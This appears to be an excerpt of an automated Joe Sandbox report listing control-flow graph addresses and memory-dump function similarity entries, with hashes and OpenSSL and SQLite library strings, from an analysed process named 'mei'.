1763->1757 1772 7ffe0036ee33-7ffe0036ee3a 1763->1772 1791 7ffe0036ee8a-7ffe0036eeb0 call 7ffe0038cda1 call 7ffe00311d93 1764->1791 1783 7ffe0036eee5-7ffe0036eeef call 7ffe0038cd9b 1765->1783 1784 7ffe0036eef1-7ffe0036eef8 1765->1784 1767 7ffe0036ee80-7ffe0036ee85 call 7ffe0038cd9b 1766->1767 1768 
7ffe0036ee79-7ffe0036ee7e 1766->1768 1767->1791 1768->1765 1768->1767 1779 7ffe0036f060-7ffe0036f08d call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1770->1779 1780 7ffe0036f05b-7ffe0036f05e 1770->1780 1788 7ffe0036f026-7ffe0036f029 1771->1788 1772->1757 1778 7ffe0036ee3c-7ffe0036ee41 1772->1778 1786 7ffe0036f0c0 1776->1786 1787 7ffe0036f00d-7ffe0036f017 1776->1787 1778->1754 1778->1757 1789 7ffe0036f092-7ffe0036f0b7 call 7ffe0038cd9b call 7ffe0038cda1 1779->1789 1780->1779 1780->1789 1783->1791 1794 7ffe0036ef3e-7ffe0036ef41 call 7ffe00312086 1784->1794 1795 7ffe0036eefa-7ffe0036ef05 call 7ffe0038d85d 1784->1795 1800 7ffe0036f0c3-7ffe0036f0d1 call 7ffe0038d2c3 1786->1800 1796 7ffe0036f048-7ffe0036f04e 1787->1796 1797 7ffe0036f02b-7ffe0036f036 1788->1797 1798 7ffe0036f038-7ffe0036f03b 1788->1798 1789->1786 1826 7ffe0036f0bb call 7ffe0038cda7 1789->1826 1791->1800 1812 7ffe0036ef46-7ffe0036ef48 1794->1812 1821 7ffe0036ef16-7ffe0036ef26 call 7ffe0038cd95 1795->1821 1822 7ffe0036ef07-7ffe0036ef11 call 7ffe0038cd9b 1795->1822 1796->1756 1806 7ffe0036f050-7ffe0036f053 1796->1806 1797->1796 1798->1786 1808 7ffe0036f041 1798->1808 1800->1736 1824 7ffe0036f0d3-7ffe0036f0e1 1800->1824 1806->1786 1808->1796 1818 7ffe0036ef7f-7ffe0036ef97 call 7ffe00311fff 1812->1818 1819 7ffe0036ef4a-7ffe0036ef4f call 7ffe0038cd9b 1812->1819 1839 7ffe0036efa5-7ffe0036efa9 1818->1839 1840 7ffe0036ef99-7ffe0036efa3 call 7ffe0038cd9b 1818->1840 1836 7ffe0036ef54-7ffe0036ef7a call 7ffe0038cda1 call 7ffe00311d93 1819->1836 1837 7ffe0036ef28-7ffe0036ef32 call 7ffe0038cd9b 1821->1837 1838 7ffe0036ef37 1821->1838 1822->1791 1829 7ffe0036f0e3 1824->1829 1830 7ffe0036f0e8 1824->1830 1826->1786 1829->1830 1830->1736 1836->1786 1837->1791 1838->1794 1842 7ffe0036efb1-7ffe0036efb8 1839->1842 1843 7ffe0036efab-7ffe0036efaf 1839->1843 1840->1836 1847 7ffe0036efba-7ffe0036efc7 call 7ffe0031186b 1842->1847 1848 7ffe0036efe6-7ffe0036efee 1842->1848 1843->1842 1843->1847 1847->1800 1855 
7ffe0036efcd-7ffe0036efd4 1847->1855 1848->1755 1856 7ffe0036efdf 1855->1856 1857 7ffe0036efd6-7ffe0036efdd 1855->1857 1856->1848 1857->1848 1857->1856
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem.c$state_machine
                                                                                                                                                                      • API String ID: 1452528299-1722249466
                                                                                                                                                                      • Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                      • Instruction ID: a5f6cd55039a290be86357726a6298dd4048268b8e7174718c827c33611df773
                                                                                                                                                                      • Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
                                                                                                                                                                      • Instruction Fuzzy Hash: 43A18B36A1C64386FBA2AB2594407BD2391EF41B44F189432DB0D4A7EEDE3DE889C751
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1858 7ffe00311280-7ffe00358a4f call 7ffe0031132a 1862 7ffe00358a55-7ffe00358a5c 1858->1862 1863 7ffe00358b9b-7ffe00358bd0 call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1858->1863 1865 7ffe00358a5e-7ffe00358a65 1862->1865 1866 7ffe00358a6b-7ffe00358a71 1862->1866 1881 7ffe00358b0d-7ffe00358b22 1863->1881 1865->1863 1865->1866 1866->1863 1867 7ffe00358a77-7ffe00358a7c 1866->1867 1869 7ffe00358a83-7ffe00358a89 1867->1869 1871 7ffe00358a9e-7ffe00358aad SetLastError 1869->1871 1872 7ffe00358a8b-7ffe00358a98 1869->1872 1875 7ffe00358ab3-7ffe00358ac5 call 7ffe0038cdf5 1871->1875 1876 7ffe00358b3f-7ffe00358b6f call 7ffe0038cd9b call 7ffe0038cda1 call 7ffe00311d93 1871->1876 1872->1871 1874 7ffe00358b33-7ffe00358b3a 1872->1874 1874->1869 1883 7ffe00358aca-7ffe00358acf 1875->1883 1890 7ffe00358b74-7ffe00358b83 1876->1890 1885 7ffe00358b25 1883->1885 1886 7ffe00358ad1-7ffe00358ad7 1883->1886 1885->1890 1891 7ffe00358b27-7ffe00358b2e 1885->1891 1888 7ffe00358b23 1886->1888 1889 7ffe00358ad9-7ffe00358aeb 1886->1889 1888->1885 1889->1872 1895 7ffe00358aed-7ffe00358b05 1889->1895 1893 7ffe00358b85-7ffe00358b8c 1890->1893 1894 7ffe00358b94-7ffe00358b96 1890->1894 1891->1869 1893->1894 1897 7ffe00358b08 1894->1897 1895->1897 1897->1881
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
• API String ID: 1452528299-1219543453
• Opcode ID: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
• Instruction ID: da3ab4d352aa00ec149d68862ca6aebc3afaf17bb71f3dcbc162f85e81a628b0
• Opcode Fuzzy Hash: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
• Instruction Fuzzy Hash: D3418A72A08B4692EB62DF29D4846B873A4FB44B84F544132EB4D13BB9DF7DE466C700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
• Instruction ID: 49bc30436e6d90acfc40958dada55e55b833763fc3d38fdcf32c3389d05e86c0
• Opcode Fuzzy Hash: aea56f64fe44ad7b0340a1766d39962d55ffaa5f78c982329402f1f7499899da
• Instruction Fuzzy Hash: 4731F236A0C2538EE7669F25A45027D77A1EB44B48F588435DF08877AECF3DE886C740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
• Instruction ID: d13a0cfa35c4b1c9461e49bdb394a77ebeb847a2cdfd8ee2cef83aab52a5e717
• Opcode Fuzzy Hash: 7996a06857c3f91e8426b2d630f3f6f22c05bb801b80ee25fc1232160325fa23
• Instruction Fuzzy Hash: 5B316C36A08253CAF766AF25A45027D63A5EB44B84F18C431DF09477AEDF3DE896C740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
• Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
• Instruction ID: 290d2b8983907e26b32ae4281cd61b45e2e912f78f4ae8f25122f8c370640c96
• Opcode Fuzzy Hash: 549c9418ccfda40514b604c35745b668e5ba7805ab55c6a8479e28d837946d2b
• Instruction Fuzzy Hash: A1215132608740C7D354DB26E9806AEB3A5FB88B94F544135EB9847F69CF3CE555CB04
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: Bad ptr map entry key=%u expected=(%u,%u) got=(%u,%u)$Failed to read ptrmap key=%u$Freelist: $Page %u: never used$Page %u: pointer map referenced$incremental_vacuum enabled with a max rootpage of zero$max rootpage (%u) disagrees with header (%u)
• API String ID: 817585512-741541785
• Opcode ID: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
• Instruction ID: 73a5bd40f5c8d6500d049e8bc51a0fe30d6a381047b1efe947423205586cec53
• Opcode Fuzzy Hash: b9356b5a1fbadadde7b26d0aebaef2e44b18eb42acd06dc5fd9ac9bfe1c0a29b
• Instruction Fuzzy Hash: 76027A33F086528AE724CB25E464A6D77A1FB94784F15423ADB7E87BD8DF38E4418B40
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
• Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
Similarity
• API ID: 00007A4519
• String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
• API String ID: 817585512-463513059
• Opcode ID: 9b736c4141148f97de10efb1246dfa11abb0bdcc0c82e989849714250e367696
• Instruction ID: c214b5f388be68993dc9e39570c3ce2537970454109df442f82e4000808d0e9c
• Opcode Fuzzy Hash: 9b736c4141148f97de10efb1246dfa11abb0bdcc0c82e989849714250e367696
• Instruction Fuzzy Hash: 04E12152F183C647EF1C8F39A4759792B90AB55784F58423ADABE837D5DE2CB212C380
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.2037809311.00007FFDFAC71000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAC70000, based on PE: true
• Associated: 00000001.00000002.2037779023.00007FFDFAC70000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFACD2000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD1E000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD21000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD26000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD83000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD85000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2037809311.00007FFDFAD88000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038143865.00007FFDFAD89000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfac70000_mei.jbxd
Similarity
• API ID: 00007A4519ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3282304195-0
• Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
• Instruction ID: c99e4008c83ffe10d32176cd6607247ef1de8db0b93334dab4124a9fd38e7317
• Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
• Instruction Fuzzy Hash: 0E314976709A858AEB648F60F8A0BFD2364FB84744F44407ADA5E47BC8EF38D648C710
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007B6570
                                                                                                                                                                      • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                      • API String ID: 4069847057-331183818
                                                                                                                                                                      • Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                      • Instruction ID: 6a2fa3dd8e56d083a01bac934a9cdc996407267300092ad3358c886ac979e3f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                      • Instruction Fuzzy Hash: E1E19172A1C6828AE7668E29A44077A77D1FB65784F105035EB9E43BADDF3CE941CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                      • Instruction ID: f70688410dd9e38e62a382a1c6b75897b8946bc5f30fe3f592a9221cb6924844
                                                                                                                                                                      • Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F311876A09B919AEBA19F60E8407ED6360FB84744F44443ADB4E87BA9DF3CD64CC710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                      • API String ID: 0-1194634662
                                                                                                                                                                      • Opcode ID: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
                                                                                                                                                                      • Instruction ID: b5f6216f7640dbb8cd2158a6b8b470a68a41d313b49de6c29384ab89e03916c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 88c8b04c2ab8bcf9e7f70dfe1e121138aee3cd889fd0a6941f62ea240cb270fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 3CD19B32B1878285EB52DB29D8416FD67A0EB89B84F484072EF4C4B7AADF7CE545C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                      • API String ID: 3568877910-3130753023
                                                                                                                                                                      • Opcode ID: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
                                                                                                                                                                      • Instruction ID: a39d94d67ad6cfa4d8b50724598d9d9145fde04723d73097e4b80e92da9db9b2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a42b0082f3978e4a625e517d7351a3eb170e7835e453a3fe52c3c890b2c269d
                                                                                                                                                                      • Instruction Fuzzy Hash: 9012D062A28A8381FB52DB65D4042BEA790FF85784F40A032EF8D477AEDF7CE5458710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
